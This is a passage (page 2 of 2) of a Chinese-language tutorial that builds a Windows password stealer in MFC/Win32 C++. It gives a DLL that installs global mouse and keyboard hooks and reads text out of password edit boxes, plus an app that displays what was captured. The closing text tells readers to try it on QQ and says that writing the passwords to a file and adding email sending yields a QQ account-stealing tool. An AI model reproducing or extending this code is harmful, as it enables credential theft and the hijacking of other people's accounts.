利用鼠标键盘钩子截获密码

5：加入枚举窗口的函数。如下：（注意，因为前面的函数据要用到此函数，所以要么在前面声明，要么放在上面函数之前定义。

BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam)
{ file://enum the child window,find passedit
if(hwnd)
{
LONG style=::GetWindowLong(hwnd,GWL_STYLE); file://得到STYLE
if(style&ES_PASSWORD) file://是密码框
{
char szPass[255];
::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); file://得到PASS
::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); file://显示
return TRUE;
}
}

return TRUE;
}

6：在DEF文件中定义段属性： （这步很重要）
　　SECTIONS
　　mydata READ WRITE SHARED

7：完成StartHook,StopHook函数，启动/关闭钩子，如下:
BOOL CGetPassHook::StartHook(HWND hwnd)
{ file://install hoook
hMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);
file://mouse hook
hKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0);
file://keyboard hook
if(hMouseHook&&hKeyBoardHook)
{
hOutPutWnd=hwnd; file://显示密码的句柄
return TRUE;
}
return FALSE;
}

BOOL CGetPassHook::StopHook()
{ file://unstall hook
BOOL mHook=UnhookWindowsHookEx(hMouseHook);
BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);
if(mHook&&kHook)
return TRUE;
return FALSE;
}

8：在DLLMAIN函数中得到DLL句柄，要用到glhInstance变量，因此要加入一句，如下：
extern HINSTANCE glhInstance; file://记得这里
extern "C" int APIENTRY
DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
UNREFERENCED_PARAMETER(lpReserved);
if (dwReason == DLL_PROCESS_ATTACH)
{
TRACE0("GETPASS.DLL Initializing!\n");

if (!AfxInitExtensionModule(GetPassDLL, hInstance))
return 0;
new CDynLinkLibrary(GetPassDLL);
glhInstance=hInstance; file://得到句柄
}
else if (dwReason == DLL_PROCESS_DETACH)
{
TRACE0("GETPASS.DLL Terminating!\n");
AfxTermExtensionModule(GetPassDLL);
}
return 1; // ok
}

9：编译，完成DLL部分，

下面建立APP部分。如下：

1：新建MFC AppWizard(exe)命名为GetPassWord,并在第一步中选择Add to Current WorkSpace加入到当前工作区，这样方便。

2：将刚才的DLL中的GetPass.lib,和GetPassHook.h拷贝APP所在目录，然后Project->Add to Project-->Files
选择这两个文件。

2：在主对话框中，加入一个EDIT，ID 为IDC_EDIT_PASS

3：在CGetPassWordDlg.h中包含GetPassHook.h文件，声明一个对象。如下：

#include "GetPassHook.h"
class CGetPassWordDlg : public CDialog
{
protected:
CGetPassHook m_hook;
。。。
DECLARE_MESSAGE_MAP()
};

4：在实现文件中：OnInitDialog()中起动HOOK

BOOL CGetPassWordDlg::OnInitDialog()
{
CWnd *pWnd=GetDlgItem(IDC_EDIT_PASS);
m_hook.StartHook(pWnd->GetSafeHwnd()); file://install hook

return TRUE; // return TRUE unless you set the focus to a control
}

5：加入WM_DESTROY消息，在退出程序时停止HOOK，如下：
void CGetPassWordDlg::OnDestroy()
{
CDialog::OnDestroy();
m_hook.StopHook(); file://stop hook
}

6：将GetPass.dll拷贝到。EXE一个目录下，

7：编译，运行.
这样，你在输入任何密码框输入密码时，密码都将截获。就算键盘HOOK失效，移动鼠标到密码框，也都获取*号密码，因为我们安装两个HOOK。启动QQ，输入密码，试下看是否已经截获了密码？将本程序稍做修改，将截获的密码输出到文件，并加入发送邮件攻能，一个QQ盗号器就做成了。

上一页 [1] [2]